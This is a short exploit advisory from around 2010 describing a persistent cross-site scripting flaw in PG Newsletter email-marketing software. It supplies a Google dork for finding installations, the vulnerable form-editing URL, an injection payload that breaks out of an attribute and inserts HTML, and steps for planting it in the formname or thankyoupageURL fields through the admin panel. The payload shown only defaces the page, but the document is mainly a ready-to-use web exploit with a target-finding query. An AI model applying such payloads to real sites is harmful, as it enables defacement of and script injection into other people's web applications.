XSSed_by_r007k17

                                              %+
$.......#........4.........|).......0............\/\/       %+


                                               %+
                                                       %+


%++++++++++++++++++++++++++++++++++++++++


# Exploit Title: PG Newsletter persistent XSS vulnerability
# Vendor:  demo.newsletter.pro
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D
# My Blog: http://www.shadowrootkit.wordpress.com
# Google Dork:  © 2010 PilotGroup.NET <http://www.pilotgroup.net/> Powered
by PG Newsletter Software <http://www.newsletter.pro/> - email marketing
software

****************************************************************************************************************************************************************************************
Persistent XSS Vulnerability
********************************
{DEMO} : demo.newsletter.pro/forms/index.php?sel=edit
EXPLOIT:  ">><marquee><h1>XSSed_by_r007k17</h1></marquee>

Observe: login to the admin panel(demo).Inject this script in a create form
page, i.e, (DEMO) in formname field or thankyoupageURL field
Now observe: demo.newsletter.pro/forms/index.php

*****************************************************************************************************************************************************************************************
sp3c14l Thanks to s1d3 effects and my friends@!3.14--
*****************************************************************************************************************************************************************************************